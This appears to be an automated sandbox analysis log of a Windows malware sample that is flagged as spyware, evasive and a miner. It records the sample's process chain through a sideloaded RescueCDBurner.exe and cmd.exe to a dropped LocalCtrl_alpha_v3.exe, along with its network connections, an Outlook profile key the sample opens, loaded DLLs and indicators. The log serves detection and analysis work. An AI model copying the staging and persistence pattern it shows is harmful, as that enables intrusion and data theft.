Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2546797096.00000000085E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2546797096.00000000085E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50036 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50042 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50049 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50060 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50075 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50098 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50100 version: TLS 1.2
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile deleted: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: pfce.5.drStatic PE information: Number of sections : 12 > 10
Source: morvrstbj.11.drStatic PE information: Number of sections : 12 > 10
Source: kXzODlqJak.exe, 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000000.1471918074.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1795962941.000000006D0DA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameTXFTNActiveX.DLLR vs kXzODlqJak.exe
Source: kXzODlqJak.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@64/285@23/18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A747 FormatMessageW,GetLastError,LocalFree,0_2_0093A747
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,0_2_0093B884
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,2_2_00F7B884
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093FE01 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_0093FE01
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094699C FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,0_2_0094699C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009198F9 ChangeServiceConfigW,GetLastError,0_2_009198F9
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Users\user\AppData\Local\Temp\Rubrician_20250109085412.cleanroom.log
Source: kXzODlqJak.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: kXzODlqJak.exeReversingLabs: Detection: 44%
Source: kXzODlqJak.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile read: C:\Users\user\Desktop\kXzODlqJak.exe
Source: unknownProcess created: C:\Users\user\Desktop\kXzODlqJak.exe "C:\Users\user\Desktop\kXzODlqJak.exe"
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632Jump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exe Section loaded: windows.storage.dll, wldp.dll, profapi.dll, userenv.dll, kernel.appcore.dll, cryptbase.dll, msi.dll, version.dll, cabinet.dll, msxml3.dll, feclient.dll, iertutil.dll, apphelp.dll
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe Section loaded: windows.storage.dll, wldp.dll, profapi.dll, userenv.dll, kernel.appcore.dll, cryptbase.dll, msi.dll, version.dll, cabinet.dll, msxml3.dll, feclient.dll, iertutil.dll, uxtheme.dll, wininet.dll, apphelp.dll
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe Section loaded: apphelp.dll, starburn.dll, qtcore4.dll, qtgui4.dll, qtnetwork4.dll, qtxml4.dll, msvcp100.dll, msvcr100.dll, dbghelp.dll, winmm.dll, dbgcore.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe Section loaded: apphelp.dll, starburn.dll, qtcore4.dll, qtgui4.dll, qtnetwork4.dll, qtxml4.dll, msvcp100.dll, msvcr100.dll, dbghelp.dll, winmm.dll, dbgcore.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll, wldp.dll, kernel.appcore.dll, windows.storage.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, bitsproxy.dll, apphelp.dll, netutils.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: apphelp.dll, shdocvw.dll, version.dll, cryptsp.dll, winhttp.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, uxtheme.dll, windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe Section loaded: starburn.dll, qtcore4.dll, qtgui4.dll, qtnetwork4.dll, qtxml4.dll, msvcp100.dll, msvcr100.dll, dbghelp.dll, winmm.dll, dbgcore.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll, wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: shdocvw.dll, version.dll, cryptsp.dll, winhttp.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, uxtheme.dll, windowscodecs.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: levtqufltbol.5.dr LNK file: ..\..\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: kXzODlqJak.exe Static file information: File size 14323584 > 1048576
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe File opened: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dll
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kXzODlqJak.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kXzODlqJak.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0 source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateO source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
